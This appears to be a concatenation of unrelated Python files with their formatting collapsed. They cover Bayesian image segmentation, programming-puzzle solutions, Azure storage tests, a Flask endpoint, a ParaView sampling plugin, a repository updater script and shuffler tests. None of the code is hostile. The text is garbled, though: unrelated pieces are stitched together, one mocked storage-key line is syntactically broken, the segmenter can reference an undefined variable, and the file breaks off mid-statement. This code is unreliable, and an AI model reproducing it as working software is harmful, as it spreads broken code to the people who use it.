hyperparameters at, bt, nt, mt, Wt = thetat # Initialize logarithmic rho log_rho = np.zeros((H*W, self.K)) for k in range(self.K): # Compute expected log mixing coefficient E1 = digamma(at[k]) - digamma(np.sum(at)) # Compute exponentiated expected log precision E2 = (D*np.log(2) + self.log_det(Wt[:, :, k]) + self.multivariate_digamma(nt[k], D)) # Compute expected hypermean and hyperprecision E3 = D/bt[k] + self.distW(X - mt[k, :], nt[k]*Wt[:, :, k]) # Update variational parameter at current pixels log_rho[:, k] = E1 + E2/2 - E3/2 # Subtract largest number from log_rho log_rho = log_rho - np.max(log_rho, axis=1)[:, np.newaxis] # Exponentiate and normalize rho = np.exp(log_rho) / np.sum(np.exp(log_rho), axis=1)[:, np.newaxis] # Check for underflow problems if np.any(np.sum(rho, axis=1) == 0.0): raise RuntimeError('Variational parameter underflow.') return rho.reshape((H, W, self.K)) def maximization_step(self, X, rho, thetat): """ Perform maximization step from variational-Bayes-EM. Parameters ---------- X : array Observed image (height by width by channels). rho : array Array of variational parameters (height by width by classes). thetat : array Current iteration of hyperparameters of posteriors. Returns ------- thetat : array Next iteration of hyperparameters of posteriors. """ # Shape of image H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) rho = rho.reshape((H*W, self.K)) # Unpack parameter sets a0, b0, n0, m0, W0 = self.theta0 at, bt, nt, mt, Wt = thetat # Iterate over classes for k in range(self.K): # Total responsibility for class k Nk = np.sum(rho[:, k], axis=0) # Responsibility-weighted mean for class k xk = np.sum(rho[:, [k]] * X, axis=0) / Nk # Responsibility-weighted covariance for class k Sk = ((X - xk) * rho[:, [k]]).T @ (X - xk) / Nk # Update alpha at[k] = a0[k] + Nk # Update nu nt[k] = n0[k] + Nk # Update beta bt[k] = b0[k] + Nk # Update hypermean mt[k, :] = (b0[k]*m0[k, :] + Nk*xk) / (b0[k] + Nk) # Update hyperprecision Wt[:, :, k] = inv(inv(W0[:, :, k]) + Nk*Sk + (b0[k]*Nk) / bt[k] * (xk - m0[k, :]).T @ (xk - m0[k, :])) return at, bt, nt, mt, Wt def expectation_maximization(self, X): """ Perform Variational Bayes Expectation-Maximization. Parameters ---------- X : array (instances by features) Data array. Returns ------- rho : array (instances by components) Variational parameters of posterior for label image. """ # Get shape of image H, W, D = X.shape # Initialize posterior hyperparameters thetat, rho = self.initialize_posteriors(X) # Initialize old energy variable F_ = np.inf for t in range(self.max_iter): # Monitor progress every tenth iteration if t % (self.max_iter/10) == 0: # Report progress print('Iteration ' + '{0:03}'.format(t+1) + '/' + str(self.max_iter) + '\t', end='') # Compute free energy to monitor progress F = self.free_energy(X, rho, thetat, report=True) if np.abs(F - F_) <= self.tol: print('Step size is below tolerance threshold.') break # Update old energy F_ = F # Expectation step rho = self.expectation_step(X, thetat, savefn=('rho_t' + str(t))) # Expectation step thetat = self.maximization_step(X, rho, thetat) # Return segmentation along with estimated parameters return rho, thetat def segment(self, X): """ Fit model to data and segment image. Parameters ---------- X : array. Observed image (height by width by channels). Returns ------- pred : array Segmentation produced by the model. post : array Posterior indicator distributions. theta : tuple of arrays Posterior hyperparameters of parameter distributions. """ # Check shape of image H, W, D = X.shape # Check if dimensionality of given data matches prior dimensionality. if not self.D == D: # Report print('Re-setting priors.') # Set dimensionality attribute self.D = D # Set prior hyperparameters self.set_prior_hyperparameters(D=D, K=self.K) # Perform VB-EM for segmenting the image post, params = self.expectation_maximization(X) # Compute most likely class pred = np.argmax(post, axis=2) # Return segmented image, variational posteriors and parameters return pred, post, params class SemisupervisedGaussianMixture(VariationalMixture): """ Variational Gaussian Mixture Image model. This implementation multivariate images (height by width by channel). It is based on the RPubs note by : https://rpubs.com/cakapourani/variational-bayes-gmm """ def __init__(self, num_channels=1, num_components=2, init_params='nn', max_iter=10, tol=1e-5): """ Model-specific constructors. Parameters ---------- num_channels : int Number of channels of image (def: 1). num_components : int Number of components (def: 2). theta0 : tuple Prior hyperparameters. max_iter : int Maximum number of iterations to run for (def: 10). tol : float Tolerance on change in x-value (def: 1e-5). Returns ------- None """ # Store data dimensionality if num_channels >= 1: self.D = num_channels else: raise ValueError('Number of channels must be larger than 0.') # Store model parameters if num_components >= 2: self.K = num_components else: raise ValueError('Too few components specified') # Optimization parameters self.init_params = init_params self.max_iter = max_iter self.tol = tol # Set prior hyperparameters self.set_prior_hyperparameters(D=num_channels, K=num_components) def set_prior_hyperparameters(self, D, K, a0=np.array([0.1]), b0=np.array([0.1]), n0=np.array([2.0]), m0=np.array([0.0]), W0=np.array([1.0])): """ Set hyperparameters of prior distributions. Default prior hyperparameters are minimally informative symmetric parameters. Parameters ---------- D : int Dimensionality of data. K : int Number of components. a0 : float / array (components by None) Hyperparameters of Dirichlet distribution on component weights. b0 : float / array (components by None) Scale parameters for hypermean normal distribution. n0 : array (components by None) Degrees of freedom for Wishart precision prior. m0 : array (components by dimensions) Hypermeans. W0 : array (dimensions by dimensions by components) Wishart precision parameters. Returns ------- theta : tuple """ # Expand alpha's if necessary if not a0.shape[0] == K: a0 = np.tile(a0[0], (K,)) # Expand beta's if necessary if not b0.shape[0] == K: b0 = np.tile(b0[0], (K,)) # Expand nu's if necessary if not n0.shape[0] == K: # Check for sufficient degrees of freedom if n0[0] < D: print('Cannot set Wishart degrees of freedom lower than data \ dimensionality.\n Setting it to data dim.') n0 = np.tile(D, (K,)) else: n0 = np.tile(n0[0], (K,)) # Expand hypermeans if necessary if not np.all(m0.shape == (K, D)): # If mean vector given, replicate to each component if len(m0.shape) == 2: if m0.shape[1] == D: m0 = np.tile(m0, (K, 1)) else: m0 = np.tile(m0[0], (K, D)) # Expand hypermeans if necessary if not np.all(W0.shape == (D, D, K)): # If single covariance matrix given, replicate to each component if len(W0.shape) == 2: if np.all(m0.shape[:2] == (D, D)): W0 = np.tile(W0, (1, 1, K)) else: W0_ = np.zeros((D, D, K)) for k in range(K): W0_[:, :, k] = W0[0]*np.eye(D) # Store tupled parameters as model attribute self.theta0 = (a0, b0, n0, m0, W0_) def initialize_posteriors(self, X, Y): """ Initialize posterior hyperparameters Parameters ---------- X : array Observed image (height by width by channels) Returns ------- theta : tuple Set of parameters. """ # Current shape H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) Y = Y.reshape((H*W, self.K)) # Observation indicator vector O = np.any(Y == 1, axis=1) if self.init_params == 'random': # Dirichlet concentration hyperparameters at = np.ones((self.K,))*(H*W)/2 # Normal precision-scale hyperparameters bt = np.ones((self.K,))*(H*W)/2 # Wishart degrees of freedom nt = np.ones((self.K,))*(H*W)/2 mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermeans mt[k, :] = np.mean(X, axis=0) + rnd.randn(1, D)*.1 # Hyperprecisions Wt[:, :, k] = np.eye(D) # Initialize variational posterior responsibilities rho = np.ones((H, W, self.K)) / self.K elif self.init_params in ('kmeans', 'k-means'): # Fit k-means to data and obtain cluster assignment label = KMeans(n_clusters=self.K, n_init=1).fit(X).labels_ # Set rho based on cluster labels rho = np.zeros((H*W, self.K)) rho[np.arange(H*W), label] = 1 # Dirichlet concentration hyperparameters at = np.sum(rho, axis=0) # Normal precision-scale hyperparameters bt = np.sum(rho, axis=0) # Wishart degrees of freedom nt = np.sum(rho, axis=0) mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermeans mt[k, :] = np.sum(rho[:, [k]] * X, axis=0) / np.sum(rho[:, k]) # Hyperprecisions Wt[:, :, k] = np.eye(D) # Reshape responsibilities rho = rho.reshape((H, W, self.K)) elif self.init_params in ('nn', 'knn'): # Observation indicator vector O = np.any(Y == 1, axis=1) if np.sum(O) == 0.0: raise ValueError('Cannot use \'nn\' without labels.') # Call instance of k-nearest neighbour classifier kNN = KNeighborsClassifier(n_neighbors=1, weights='distance') # Fit classifier to labeled data kNN.fit(X[O, :], np.argmax(Y[O, :], axis=1)) # Set responsibilities based on kNN prediction rho = np.zeros((H*W, self.K)) rho[~O, :] = kNN.predict_proba(X[~O, :]) rho[O, :] = Y[O, :].astype('float64') # Concentration hyperparameters at = np.sum(rho, axis=0) # Precision-scale hyperparameters bt = np.sum(rho, axis=0) # Wishart degrees of freedom nt = np.sum(rho, axis=0) mt = np.zeros((self.K, D)) Wt = np.zeros((D, D, self.K)) for k in range(self.K): # Hypermean mt[k, :] = np.mean(X[Y[:, k] == 1, :], axis=0) # Hyperprecisions Wt[:, :, k] = np.eye(D) # Reshape responsibilities rho = rho.reshape((H, W, self.K)) else: raise ValueError('Provided method not recognized.') return (at, bt, nt, mt, Wt), rho def free_energy(self, X, rho, thetat, report=True): """ Compute free energy term to monitor progress. Parameters ---------- X : array Observed image (height by width by channels). rho : array Array of variational parameters (height by width by channels). thetat : array Parameters of variational posteriors. theta0 : array Parameters of variational priors. report : bool Print value of free energy function. Returns ------- rho : array Updated array of variational parameters. """ # Shapes H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) rho = rho.reshape((H*W, self.K)) # Unpack parameter sets a0, b0, n0, m0, W0 = self.theta0 at, bt, nt, mt, Wt = thetat # Preallocate terms for energy function E1 = 0 E2 = 0 E3 = 0 E4 = 0 E5 = 0 E6 = 0 E7 = 0 # Loop over classes for k in range(self.K): ''' Convenience variables ''' # Proportion assigned to each component Nk = np.sum(rho[:, k], axis=0) # Responsibility-weighted mean xk = np.sum(rho[:, [k]] * X, axis=0) / Nk # Reponsibility-weighted variance Sk = ((X - xk) * rho[:, [k]]).T @ (X - xk) / Nk # Mahalanobis distance from hypermean mWm = (mt[k, :] - m0[k, :]).T @ Wt[:, :, k] @ (mt[k, :] - m0[k, :]) # Mahalanobis distance from responsibility-weighted mean xWx = (xk - mt[k, :]) @ Wt[:, :, k] @ (xk - mt[k, :]).T # Entropy-based terms Elog_pik = digamma(at[k]) - digamma(np.sum(at)) Elog_Lak = (D*np.log(2) + self.log_det(Wt[:, :, k]) + self.multivariate_digamma(nt[k], D)) ''' Energy function ''' # First term E1 += Nk/2*(Elog_Lak - D / bt[k] - nt[k]*(np.trace(Sk @ Wt[:, :, k]) + xWx) - D*np.log(2*np.pi)) # Second term E2 += np.sum(rho[:, k] * Elog_pik, axis=0) # Third term E3 += (a0[k] - 1)*Elog_pik + (gammaln(np.sum(a0)) - np.sum(gammaln(a0))) / self.K # Fourth term E4 += 1/2*(D*np.log(b0[k] / (2*np.pi)) + Elog_Lak - D*b0[k]/bt[k] - b0[k]*nt[k]*mWm + (n0[k] - D - 1)*Elog_Lak - 2*self.log_partition_Wishart(Wt[:, :, k], nt[k]) + nt[k]*np.trace(inv(W0[:, :, k])*Wt[:, :, k])) # Ignore underflow error from log rho with np.errstate(under='ignore') and np.errstate(divide='ignore'): # Set -inf to most negative number lrho = np.maximum(np.log(rho[:, k]), np.finfo(rho.dtype).min) # Fifth term E5 += np.sum(rho[:, k] * lrho, axis=0) # Sixth term E6 += (at[k] - 1)*Elog_pik + (gammaln(np.sum(at)) - np.sum(gammaln(at))) / self.K # Seventh term E7 += (Elog_Lak/2 + D/2*np.log(bt[k] / (2*np.pi)) - D/2 - self.entropy_Wishart(Wt[:, :, k], nt[k])) # Compute free energy term F = E1 + E2 + E3 + E4 - E5 - E6 - E7 # Print free energy if report: print('Free energy = ' + str(F)) return F def expectation_step(self, X, Y, rho, thetat): """ Perform expectation step. Parameters ---------- X : array Observed image (height by width by channels). thetat : array Current iteration of parameters of variational posteriors. Returns ------- rho : array Updated array of variational parameters / responsibilities. """ # Shape of variational parameter array H, W, D = X.shape # Observation indicator vector M = np.all(~Y, axis=2) # Unpack tuple of hyperparameters at, bt, nt, mt, Wt = thetat # Initialize logarithmic rho lrho = np.zeros((H, W, self.K), dtype='float64') for k in range(self.K): # Compute expected log mixing coefficient E1 = digamma(at[k]) - digamma(np.sum(at)) # Compute exponentiated expected log precision E2 = (D*np.log(2) + self.log_det(Wt[:, :, k]) + self.multivariate_digamma(nt[k], D)) # Compute expected hypermean and hyperprecision E3 = D/bt[k] + self.distW(X - mt[k, :], nt[k]*Wt[:, :, k]) # Update variational parameter at current pixels lrho[:, :, k] = E1 + E2/2 - E3/2 # Subtract largest number from log_rho lrho[M, :] = lrho[M, :] - np.max(lrho[M, :], axis=1)[:, np.newaxis] # Exponentiate and normalize rho[M, :] = (np.exp(lrho[M, :]) / np.sum(np.exp(lrho[M, :]), axis=1)[:, np.newaxis]) # Check for underflow problems if np.any(np.abs(np.sum(rho, axis=2) - 1.0) > 1e-12): raise RuntimeError('Variational parameter underflow.') return rho def maximization_step(self, X, rho, thetat): """ Perform maximization step from variational-Bayes-EM. Parameters ---------- X : array Observed image (height by width by channels). rho : array Array of variational parameters (height by width by classes). thetat : array Current iteration of hyperparameters of posteriors. Returns ------- thetat : array Next iteration of hyperparameters of posteriors. """ # Shape of image H, W, D = X.shape # Reshape arrays X = X.reshape((H*W, D)) rho = rho.reshape((H*W, self.K)) # Unpack parameter sets a0, b0, n0, m0, W0 = self.theta0 at, bt, nt, mt, Wt = thetat # Iterate over classes for k in range(self.K): # Total responsibility for class k Nk = np.sum(rho[:, k], axis=0) # Responsibility-weighted mean for class k xk = np.sum(rho[:, [k]] * X, axis=0) / Nk # Responsibility-weighted covariance for class k Sk = ((X - xk) * rho[:, [k]]).T @ (X - xk) / Nk # Update alpha at[k] = a0[k] + Nk # Update nu nt[k] = n0[k] + Nk # Update beta bt[k] = b0[k] + Nk # Update hypermean mt[k, :] = (b0[k]*m0[k, :] + Nk*xk) / (b0[k] + Nk) # Update hyperprecision Wt[:, :, k] = inv(inv(W0[:, :, k]) + Nk*Sk + (b0[k]*Nk) / bt[k] * (xk - m0[k, :]).T @ (xk - m0[k, :])) return at, bt, nt, mt, Wt def expectation_maximization(self, X, Y): """ Perform Variational Bayes Expectation-Maximization. Parameters ---------- X : array (instances by features) Data array. Y : array Observed labels (height by width by classes). Returns ------- rho : array (instances by components) Variational parameters of posterior for label image. """ # Get shape of image H, W, D = X.shape # Initialize posterior hyperparameters thetat, rho = self.initialize_posteriors(X, Y) # Initialize old energy variable F_ = np.inf for t in range(self.max_iter): # Monitor progress every tenth iteration if t % (self.max_iter/10) == 0: # Report progress print('Iteration ' + '{0:03}'.format(t+1) + '/' + str(self.max_iter) + '\t', end='') # Compute free energy to monitor progress F = self.free_energy(X, rho, thetat, report=True) if np.abs(F - F_) <= self.tol: print('Step size is below tolerance threshold.') break # Update old energy F_ = F # Expectation step rho = self.expectation_step(X, Y, rho, thetat) # Expectation step thetat = self.maximization_step(X, rho, thetat) # Return segmentation along with estimated parameters return rho, thetat def segment(self, X, Y): """ Fit model to data and segment image. Parameters ---------- X : array. Observed image (height by width by channels). Y : array Observed labels (height by width by classes). Returns ------- pred : array Segmentation produced by the model. post : array Posterior indicator distributions. theta : tuple of arrays Posterior hyperparameters of parameter distributions. """ # Check shape of image H, W, D = X.shape # Check if dimensionality of given data matches prior dimensionality. if not self.D == D: # Report print('Re-setting priors.') # Set dimensionality attribute self.D = D # Set prior hyperparameters self.set_prior_hyperparameters(D=D, K=self.K) # Perform VB-EM for segmenting the image post, params = self.expectation_maximization(X, Y) # Compute most likely class pred = np.argmax(post, axis=2) # Return segmented image, variational posteriors and parameters return pred, post, params sladewinter/UVa-Online-Judge0 #UVa - 498 - Polly the Polynomial #Polynomial while(True): try: coef = input().split() val = input().split() n = len(coef) st = '' for v in val: sum = 0 for i in range(n): sum += int(coef[i]) * pow(int(v), n - 1 - i); st += str(sum) + ' ' print(st[:-1]) except EOFError: breakfrom .test_helper import argv_kiwi_tests import datetime import sys import mock from mock import patch from urllib.parse import urlparse from pytest import raises from azurectl.storage.container import Container import azurectl from collections import namedtuple from azurectl.azurectl_exceptions import ( AzureCannotInit, AzureContainerCreateError, AzureContainerDeleteError, AzureContainerListContentError, AzureContainerListError ) MOCK_STORAGE_NAME = 'mock-storage' class TestContainer: def setup(self): name = namedtuple("name", "name") self.name_list = [name(name="a"), name(name="b")] account = mock.Mock() credentials = namedtuple( 'credentials', ['private_key', 'certificate', 'subscription_id'] ) account.storage_name = mock.Mock(return_value=MOCK_STORAGE_NAME) account.storage_key = mock.Mock( return_value='' + ' ) account.publishsettings = mock.Mock( return_value=credentials( private_key='abc', certificate='abc', subscription_id='4711' ) ) self.container = Container(account) def test_container_alternate_init(self): container = Container( account_name=self.container.account_name, key=self.container.account_key, blob_service_host_base=self.container.blob_service_host_base ) assert container.account_name == self.container.account_name assert container.account_key == self.container.account_key assert container.blob_service_host_base == \ self.container.blob_service_host_base def test_container_failed_init(self): with raises(AzureCannotInit): Container() @patch('azurectl.storage.container.BaseBlobService.list_containers') def test_list(self, mock_list_containers): mock_list_containers.return_value = self.name_list assert self.container.list() == ['a', 'b'] @patch('azurectl.storage.container.BaseBlobService.delete_container') def test_delete(self, mock_delete): assert self.container.delete('container_name') is True mock_delete.assert_called_once_with( container_name='container_name', fail_not_exist=True ) @patch('azurectl.storage.container.BaseBlobService.create_container') def test_create(self, mock_create): assert self.container.create('container_name') is True mock_create.assert_called_once_with( container_name='container_name', fail_on_exist=True ) @patch('azurectl.storage.container.BaseBlobService.delete_container') def test_delete_raises(self, mock_delete): mock_delete.side_effect = Exception with raises(AzureContainerDeleteError): self.container.delete('container_name') @patch('azurectl.storage.container.BaseBlobService.create_container') def test_create_raises(self, mock_create): mock_create.side_effect = Exception with raises(AzureContainerCreateError): self.container.create('container_name') @patch('azurectl.storage.container.BaseBlobService.list_containers') def test_list_raises(self, mock_list_containers): mock_list_containers.side_effect = AzureContainerListError with raises(AzureContainerListError): self.container.list() @patch('azurectl.storage.container.BaseBlobService.list_blobs') def test_content(self, mock_list_blobs): mock_list_blobs.return_value = self.name_list assert self.container.content('some-container') == \ {'some-container': ['a', 'b']} @patch('azurectl.storage.container.BaseBlobService.list_blobs') def test_content_raises(self, mock_list_blobs): mock_list_blobs.side_effect = AzureContainerListContentError with raises(AzureContainerListContentError): self.container.content('some-container') def test_sas(self): container = 'mock-container' start = datetime.datetime(2015, 1, 1) expiry = datetime.datetime(2015, 12, 31) permissions = 'rl' parsed = urlparse( self.container.sas(container, start, expiry, permissions) ) assert parsed.scheme == 'https' assert parsed.netloc == MOCK_STORAGE_NAME + \ '.blob.core.windows.net' assert parsed.path == '/' + container assert 'st=2015-01-01T00%3A00%3A00Z' in parsed.query assert 'se=2015-12-31T00%3A00%3A00Z' in parsed.query assert 'sp=rl' in parsed.query assert 'sr=c' in parsed.query assert 'sig=' in parsed.query # can't actively validate the signature @patch('azurectl.storage.container.BaseBlobService.get_container_properties') def test_exists_false(self, mock_properties): mock_properties.side_effect = Exception assert self.container.exists('container_name') is False @patch('azurectl.storage.container.BaseBlobService.get_container_properties') def test_exists_true(self, mock_properties): assert self.container.exists('container_name') is True #------------------------------------------------------------------------------ # Get the status of the dominant colors index. # GET /v1/catalog/{catalog_name}/dominant_colors_index #------------------------------------------------------------------------------ import os import json import requests from urlparse import urljoin from pprint import pprint from props import * # Replace this with the custom url generated for you. api_gateway_url = props['api_gateway_url'] # Pass the api key into the header # Replace 'your_api_key' with your API key. headers = {'X-Api-Key': props['X-Api-Key']} # Catalog name. catalog_name = props['catalog_name'] api_endpoint = '/v1/catalog/%s/dominant_colors_index'%(catalog_name) url = urljoin(api_gateway_url,api_endpoint) response = requests.get(url,headers=headers) print response.status_code pprint(response.json()) 514840279/danyuan-application-cloud #!/usr/bin/python3 import json from flask import Response,Blueprint from flask import request from controller.service.StartService import StartService # 使用 蓝图 定义 模块, start = Blueprint(name='start',import_name="start" ,static_folder='./static',template_folder='./templates') @start.route("/run",methods=['POST']) def run(): params = request.json result = {"code": 1} startService = StartService() for item in params['list']: startService.run(item) return Response(json.dumps(result), mimetype='application/json') # 采用json方式发送数据 class Solution: def XXX(self, s: str, numRows: int) -> str: # 判断特殊条件 if numRows == 1 or len(s) <= numRows: return s n, i, flag, reverse, res_dic = len(s), 0, 0, 1, {} """ 指定阈值,进行Z字形下标的遍历,如当numRows=3,s="technology"时, flag(对应的行数)的值为: 0 1 2 1 0 1 2 1 0 1 t e c h n o l o g y """ threshold = numRows - 1 while i < n: # 将相同行数的字符进行拼接 if flag not in res_dic: res_dic[flag] = s[i] else: res_dic[flag] += s[i] # 当flag等于阈值时,flag的变化为递减,当flag等于0时,flag的变化为递增 if flag == 0: reverse = 1 if flag == threshold: reverse = 0 if reverse == 1: flag += 1 else: flag -= 1 i += 1 print(res_dic) res_str = "" # 拼接每一行的字符串 for res in res_dic: res_str += res_dic[res] return res_str import sqlite3 from sqlite3 import Error def sql_connection(): try: con = sqlite3.connect('baze1.db') return con except Error: print(Error) def sql_table(con): cursorObj = con.cursor() cursorObj.execute("CREATE TABLE employees(id integer PRIMARY KEY, name text, second text, photo text)") con.commit() con = sql_connection() sql_table(con) ## ========================================================================== ## ## Copyright (c) 2019 The University of Texas at Austin. ## ## All rights reserved. ## ## ## ## Licensed under the Apache License, Version 2.0 (the "License"); ## ## you may not use this file except in compliance with the License. ## ## A copy of the License is included with this software in the file LICENSE. ## ## If your copy does not contain the License, you may obtain a copy of the ## ## License at: ## ## ## ## https://www.apache.org/licenses/LICENSE-2.0 ## ## ## ## Unless required by applicable law or agreed to in writing, software ## ## distributed under the License is distributed on an "AS IS" BASIS, WITHOUT ## ## WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. ## ## See the License for the specific language governing permissions and ## ## limitations under the License. ## ## ## ## ========================================================================== ## Name = 'MH2' Label = 'MH2' Help = '' NumberOfInputs = 2 InputDataType = ['vtkPolyData', 'vtkUnstructuredGrid', 'vtkImageData'] OutputDataType = 'vtkUnstructuredGrid' ExtraXml = '' Properties = dict( arrayName = 'timeMonthly_avg_ecosysTracers_DON', nmisses = 10, nsamples = 10000, nstarts = 10, power = 1.0, sscale = 10000, max_loop_count = 100000, minvalue = -1.0, every = 10, ) def RequestData(): import vtk import random import numpy as np from vtk.numpy_interface import dataset_adapter as dsa import paraview.vtk.util.numpy_support as vnp def P(v): if v < 0: return 0 if power != 1.0: try: pv = pow(v, power) return pv except: print('E', v, power) return 0 else: return v class Interpolator: def __init__(self, dset): self.dset = dset.VTKObject self.xyz = [-10000, -20000, -30000] self.pids = vtk.reference([0]*10) self.nverts = -1 self.pc = [0]*3 self.wts = [0]*10 self.gc = vtk.vtkGenericCell() self.sid = 2 if self.dset.IsA('vtkUnstructuredGrid'): self.locator = vtk.vtkCellTreeLocator() self.locator.SetDataSet(dset.VTKObject) self.locator.BuildLocator() self.is_vtu = True else: self.is_vtu = False def Locate(self, xyz): if self.is_vtu: cid = self.locator.FindCell(xyz, 0.0, self.gc, self.pc, self.wts) if cid < 0 or min(self.wts[:4]) < 0 or max(self.wts[:4]) > 1: self.xyz = [] return False idl = vtk.vtkIdList() self.dset.GetCellPoints(cid, idl) self.ids = [idl.GetId(i) for i in range(idl.GetNumberOfIds())] else: vox = self.dset.FindAndGetCell(xyz, None, 0, 0.0, vtk.reference(self.sid), self.pc, self.wts) if vox == None: self.xyz = [] return None self.ids = [vox.GetPointId(i) for i in range(vox.GetNumberOfPoints())] self.xyz = xyz return True def Interpolate(self, xyz, a): if list(xyz) != list(self.xyz): if not self.Locate(xyz): return None if len(a.shape) == 1: return sum(self.wts[i]*a[self.ids[i]] for i in range(len(self.ids))) else: return [sum(self.wts[i]*a[self.ids[i]][j] for i in range(len(self.ids))) for j in range(a.shape[1])] class Samples: def __init__(self, dset): self.points = [] self.vars = [] self.V = [] self.PV = [] self.I = [] # for i in dset.PointData.keys(): # self.vars.append([i, dset.PointData[i], []]) def num(self): return len(self.points) def add(self, I, p, v, pv, i): err = 0 # vals = [] # for var in self.vars: # value = I.Interpolate(p, var[1]) # if value == None: # value = -99999 # vals.append(value) if err == 0: self.points.append(p) self.V.append(v) self.PV.append(pv) self.I.append(i) # for j,var in enumerate(self.vars): # print("XXX", var[0], j) # var[2].append(vals[j]) def stuff_vtu(self, outpt): outpt.SetPoints(dsa.VTKArray(np.array(self.points).astype('f4'))) outpt.PointData.append(dsa.VTKArray(np.array(self.V).astype('f4')), 'V') outpt.PointData.append(dsa.VTKArray(np.array(self.PV).astype('f4')), 'PV') outpt.PointData.append(dsa.VTKArray(np.array(self.I).astype('f4')), 'I') ct = dsa.numpyTovtkDataArray(np.array([vtk.VTK_VERTEX]*outpt.GetNumberOfPoints()).astype('u1')) co = dsa.numpy_support.numpy_to_vtkIdTypeArray(np.array(range(0, 2*outpt.GetNumberOfPoints(), 2))) ca = vtk.vtkCellArray() for i in range(outpt.GetNumberOfPoints()): ca.InsertNextCell(1, [i]) outpt.VTKObject.SetCells(ct, co, ca) # for v in self.vars: # outpt.PointData.append(dsa.VTKArray(np.array(v[2]).astype('f4')), v[0]) np.random.seed(12346) volume = inputs[0] if volume.VTKObject.IsA('vtkImageData'): is_vtu = False elif volume.VTKObject.IsA('vtkUnstructuredGrid'): is_vtu = True else: print('wha?') return samples = Samples(volume) interp = Interpolator(volume) # This stuff thresholds out the part of the incoming dataset that at or above the selected # minvalue, then selects one initial point in each connected component of the result tf = vtk.vtkThreshold() tf.SetInputData(volume.VTKObject) tf.SetInputArrayToProcess(0, 0, 0, vtk.vtkDataObject.FIELD_ASSOCIATION_POINTS, arrayName) tf.ThresholdByUpper(minvalue) cf = vtk.vtkConnectivityFilter() cf.SetInputConnection(tf.GetOutputPort()) cf.SetExtractionModeToAllRegions(); cf.ColorRegionsOn(); cf.Update(); components = dsa.WrapDataObject(cf.GetOutput()) rids = components.PointData['RegionId'] n,i = np.unique(rids, return_index=True) maxvalue = np.max(components.PointData[arrayName]) array = (components.PointData[arrayName] - minvalue) / (maxvalue - minvalue) initial_points = [] initial_pqs = [] for rid in n: selectors = rids == rid region_v = array[selectors] region_p = components.Points[selectors] max_v = np.max(region_v) max_i = np.argmax(region_v == max_v) p = region_p[max_i] v = region_v[max_i] pv = P(v) print('RID', rid, 'v', v) initial_points.append(p) initial_pqs.append(pv) if np.random.rand() < pv: samples.add(interp, p, v, pv, -1) current_points = list(initial_points) current_pqs = list(initial_pqs) misses = [0]*len(initial_points) steps = [0]*len(initial_points) print('current_points', current_points) print('current_pqs', current_pqs) done = False indx = 0 accept_count = 0 loop_count = 0 while not done and samples.num() < nsamples: loop_count = loop_count + 1 if loop_count % 1000 == 0: print(loop_count) if loop_count > max_loop_count: print("broke on total loop count") done = True if misses[indx] >= nmisses: misses[indx] = 0 current_points[indx] = initial_points[indx] current_pqs[indx] = initial_pqs[indx] cpoint = current_points[indx] + np.random.normal(loc=0.0, scale=sscale, size=3) cv = interp.Interpolate(cpoint, array) # print(cpoint, cv) if not cv: # samples.add(interp, cpoint, -2, -2, -2) continue cq = P(cv) accept = 0 if cq >= current_pqs[indx]: accept = 1 misses[indx] = 0 else: u = np.random.rand() if u < cq/current_pqs[indx]: accept = 1 misses[indx] = 0 else: accept = 0 misses[indx] = misses[indx] + 1 if accept: if accept_count % every == 0: samples.add(interp, cpoint, cv, cq, steps[indx]) misses[indx] = 0 steps[indx] = steps[indx] + 1 current_points[indx] = list(cpoint) current_pqs[indx] = cq accept_count = accept_count + 1 indx = indx + 1 if indx >= len(misses): indx = 0 samples.stuff_vtu(output) return # from sklearn.metrics import r2_score def r2_adj(y_true, y_pred, dim0, dim1): r2 = r2_score(y_true, y_pred) result = 1 - (1 - r2) * (dim0 - 1) / (dim0 - dim1 -1) return result 1-10 import os, threading, time, subprocess running = True index = 0 chars = ('-', '\\', '|', '/') def spin(text): time.sleep(.1) global index while running: print('\r' + text + chars[index], end='') index += 1 if index == len(chars): index = 0 time.sleep(.1) def display_spinner_while(text, function): threading.Thread(target=spin, args=(text,)).start() function() global running running = False def pull(): os.system('git pull') display_spinner_while('Updating repository ', pull) print('\r Update complete!') def doit_windows(): subprocess.call(['depinstaller.bat']) def doit_mac_linux(): subprocess.call(['sudo', 'depinstaller.sh']) if __name__ == '__main__': os_name = os.name if os_name == 'nt': display_spinner_while('Installing dependencies ', doit_windows) time.sleep(1) print('\r Installed dependencies') os.system('python __main__.py') elif os_name == 'posix': display_spinner_while('Installing dependencies ', doit_mac_linux) time.sleep(1) print('\r Installed dependencies') os.system('python3 __main__.py') else: display_spinner_while('Installing dependencies ', doit_mac_linux) time.sleep(1) print('\r Installed dependencies') os.system('python3 __main__.py') # Copyright 2021 Rikai Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from rikai.parquet.shuffler import RandomShuffler def shuffle_numbers(shuffler, numbers): returned = [] for i in numbers: shuffler.append(i) while shuffler.full(): returned.append(shuffler.pop()) while shuffler: returned.append(shuffler.pop()) return returned def test_randomness(): shuffler = RandomShuffler(16) expected = list(range(100)) actual = shuffle_numbers(shuffler, expected) assert len(actual) == 100 assert expected != actual assert expected == sorted(actual) def test_randomness_with_large_capacity(): """Test the case that the capacity is larger than total number of elements. """ shuffler = RandomShuffler(128) expected = list(range(100)) actual = shuffle_numbers(shuffler, expected) assert len(actual) == 100 assert expected != actual assert expected == sorted(actual) def test_fifo(): shuffler = RandomShuffler(capacity=1) returned = shuffle_numbers(shuffler, range(100)) assert len(returned) == 100 def test_fifo_with_single_item(): shuffler = RandomShuffler(capacity=1) shuffler.append(1) assert shuffler assert shuffler.full() assert len(shuffler) == 1 assert shuffler.pop() == 1 assert not shuffler.full() import re; from sklearn.feature_extraction.text import CountVectorizer; from collections import Counter; import pandas as pd; documents = ['Hello, how are you!', 'Win money, win from home.', 'Call me now.', 'Hello, Call hello you tomorrow?']; for 